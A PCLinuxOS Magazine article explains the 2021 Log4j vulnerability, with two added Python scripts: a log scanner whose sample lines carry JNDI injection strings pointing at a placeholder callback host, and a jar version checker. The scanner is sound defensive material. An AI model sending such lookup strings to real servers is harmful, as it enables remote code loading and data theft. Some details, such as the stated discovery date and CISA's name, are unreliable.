PCLinuxOS Magazine

Log4J - What is the most severe vulnerability of 2021?


by Alessandro Ebersol (Agent Smith)



To close out 2021, a major vulnerability has been discovered that has left the whole world on alert: the Log4J flaw.

The open source logging library, used by Apple, Twitter, Steam, and Tencent ventures, has a serious flaw that allows malicious actors to steal sensitive data, send files to a server, and more.

According to Google, more than 35,000 Java packages, which represents more than 8% of the Maven Central repository (the main Java repository), were affected by the problem. Discovered on December 16, the vulnerability was deemed one of the "most serious" ever seen by Jen Easterly, head of the US Department of Cybersecurity and Infrastructure Security Agency (CISA).



How do attackers take advantage of the Log4j flaw?

According to Tenable, a Cyber Exposure specialist company, the Log4J problem is considered critical because exploiting it is relatively simple. The flaw allows an unauthenticated remote attacker to attack the popular Apache Log4J logging library, which is used by several very popular services such as iCloud, Amazon, and Tesla, in addition to those already mentioned at the beginning of this article.

According to Tenable, the vulnerability is exploited when an attacker sends a manipulated request that performs a Java Naming and Directory Interface (JNDI) injection through a variety of services, including the Lightweight Directory Access Protocol (LDAP), Remote Method Invocation (RMI), and the Domain Name System (DNS).

I have watched videos about the vulnerability myself, and it works similarly to SQL injection, where it is possible to inject commands into forms.

If the vulnerable server uses Log4J to log requests, the exploit sends a malicious payload via JNDI, using one of the services mentioned above, that the logging library then resolves against a server controlled by the attacker.
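Because the payload only works if it ends up in a logged field, the first place a defender can see it is the web-server or application log. The following scanner is an added example (not from the article or from the Log4j project) that reads access-log lines and flags any that carry a JNDI lookup string for the services named above (LDAP, RMI, DNS; LDAPS is added on the assumption that JNDI accepts it too), extracting the callback host so it can go straight into an egress block list or IoC review. The log lines are constructed samples, and `callback.example` is a placeholder.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of web-server access-log lines (not real traffic). Lines 2-4
# carry the kind of JNDI lookup string the article describes, placed in the
# User-Agent header or the query string, where a Log4j-backed application
# would log it. "callback.example" is a placeholder host.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://callback.example/a}"
10.0.0.9 - - [16/Dec/2021:10:00:03 +0000] "GET /api?user=${jndi:rmi://callback.example:1099/b} HTTP/1.1" 400 0 "-" "curl/7.79"
10.0.0.7 - - [16/Dec/2021:10:00:04 +0000] "POST /search HTTP/1.1" 200 64 "-" "${JNDI:dns://callback.example/c}"
10.0.0.3 - - [16/Dec/2021:10:00:05 +0000] "GET /about HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Matches the plain form of a JNDI lookup as unpatched Log4j 2 would evaluate it:
#   ${jndi:<scheme>://<callback host>[:port]/<path>}
# Schemes: the ones the article names (LDAP, RMI, DNS) plus LDAPS (assumption:
# widen this list to whatever your environment needs).
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns)\s*:\s*//(?P<callback>[^/}\s]+)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    line_no: int    # 1-based line number within the scanned text
    scheme: str     # lower-cased JNDI scheme (ldap, ldaps, rmi, dns)
    callback: str   # attacker-controlled host[:port] the lookup would contact
    line: str       # the full log line, kept for triage


def find_jndi_lookups(text: str) -> list[Finding]:
    """Return one Finding per log line that contains a JNDI lookup string."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = JNDI_PATTERN.search(line)
        if m:
            findings.append(
                Finding(line_no, m.group("scheme").lower(), m.group("callback"), line)
            )
    return findings


def count_by_scheme(findings: list[Finding]) -> dict[str, int]:
    """How many hits used each JNDI scheme (useful for a quick triage summary)."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.scheme] = counts.get(f.scheme, 0) + 1
    return counts


def callback_hosts(findings: list[Finding]) -> set[str]:
    """Distinct callback hosts, ready for an egress block list or IoC review."""
    return {f.callback for f in findings}


if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no}: {f.scheme} lookup -> {f.callback}")
    print("by scheme:", count_by_scheme(hits))
    print("callback hosts:", sorted(callback_hosts(hits)))
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents (or feed lines from `sys.stdin`). Note that the pattern matches only the plain, unencoded form of the lookup; a production detection rule also has to cover the encoded and nested variants that circulated in the wild, and a hit in the log does not by itself prove the lookup succeeded, only that someone tried it.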


What is the danger of the Log4j flaw?



Amit Yoran, cybersecurity expert and CEO of Tenable, says that this is the most critical problem of the last decade. Going even further, he argues that this is the largest vulnerability in the history of modern computing.

"This type of vulnerability is a reminder that organizations must develop mature cybersecurity programs to understand cyber risk in a dynamic world. While details are still beginning to come out, we encourage organizations to update their security controls, assume they have been compromised, and activate existing incident response plans," he comments.

According to Yoran, organizations should make it a priority to work with security and information engineering teams to drive agile responses to potential incidents and identify the internal impact of the breach.

One of the biggest risks that companies run is precisely that of becoming victims of ransomware attacks. In this type of scam, the attacker manages to encrypt the victim's information. After that, the cybercriminal charges a fee (usually in cryptocurrency) to release the data.


Do users need to be worried about Log4j?

The Log4j flaw has already been fixed by the release of patches (upgrade to Log4j 2.3.1 for Java 6, 2.12.3 for Java 7, or 2.17.0 for Java 8 and later). However, with the scope of the problem and the large number of companies affected, should the end user be concerned about the problem?
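Knowing the three patched releases is only useful if you can check what is actually deployed. The script below is an added example (not from the article or the Log4j project) that turns those release numbers into a version check and runs it over an inventory of jar paths. It assumes that 2.3.1 and 2.12.3 apply to the 2.3.x and 2.12.x branches respectively and that every other 2.x version must reach 2.17.0, and it looks only at `log4j-core`, which is the artifact that contains the lookup code. The jar paths are constructed samples.

```python
from __future__ import annotations

import re

# Minimum patched release per Log4j 2 branch, as listed in the article:
# 2.3.1 (Java 6), 2.12.3 (Java 7), 2.17.0 (Java 8 and later).
# Assumption: a version belongs to a branch by its first two components;
# any other 2.x version is held to 2.17.0.
FIXED_VERSIONS: dict[tuple[int, int], tuple[int, ...]] = {
    (2, 3): (2, 3, 1),
    (2, 12): (2, 12, 3),
}
DEFAULT_FIXED: tuple[int, ...] = (2, 17, 0)

# Only log4j-core carries the JNDI lookup code, so other log4j-* jars are ignored.
JAR_RE = re.compile(r"log4j-core-(\d+(?:\.\d+)*)\.jar$")

# Constructed inventory of jar paths; none of these are real systems.
SAMPLE_JARS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",
    "/srv/legacy/lib/log4j-core-2.12.3.jar",
    "/srv/old/lib/log4j-core-2.3.0.jar",
    "/srv/new/lib/log4j-core-2.17.0.jar",
]


def parse_version(version: str) -> tuple[int, ...]:
    """'2.17' -> (2, 17, 0); a qualifier such as '-rc1' is dropped before parsing."""
    core = version.split("-")[0]
    parts = tuple(int(p) for p in core.split("."))
    return parts + (0,) * (3 - len(parts))


def required_fix(version: str) -> tuple[int, ...]:
    """The lowest release that counts as patched for this version's branch."""
    v = parse_version(version)
    return FIXED_VERSIONS.get((v[0], v[1]), DEFAULT_FIXED)


def is_patched(version: str) -> bool:
    """True when the version is at or above the fixed release for its branch."""
    v = parse_version(version)
    if v[0] != 2:
        raise ValueError("this check covers Log4j 2.x versions only")
    return v >= required_fix(version)


def audit_jars(paths: list[str]) -> list[tuple[str, str, bool]]:
    """(path, version, patched?) for every log4j-core jar in the inventory."""
    results = []
    for p in paths:
        m = JAR_RE.search(p)
        if m:
            results.append((p, m.group(1), is_patched(m.group(1))))
    return results


def unpatched(paths: list[str]) -> list[str]:
    """Paths of log4j-core jars that still need upgrading."""
    return [p for p, _, ok in audit_jars(paths) if not ok]


if __name__ == "__main__":
    for path, version, ok in audit_jars(SAMPLE_JARS):
        status = "ok" if ok else f"UPGRADE to {'.'.join(map(str, required_fix(version)))}"
        print(f"{path}: {version} -> {status}")
```

On a real host, build the path list with `find / -name 'log4j-core-*.jar'` and pass it in; jars bundled inside other archives (fat jars, WAR files) are not on the file system as separate files and need a separate unpacking step, so an empty result from this check does not mean Log4j is absent.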

Security experts point out that applications installed on computers and other personal devices that use the software are rare. This does not mean, however, that people can rest assured; quite the contrary.

Besides the fact that our personal data is "in the hands" of the various services and companies that use the open source platform, there is danger for everyone, so it is necessary to create healthier digital habits.

There are no applications in the PCLinuxOS repository that use Log4J. It is used mostly by server applications, so servers are more vulnerable, and, generally, companies run old versions of Debian on their servers that are not updated, which can expose those companies' servers (and their customers' data) to the flaw.


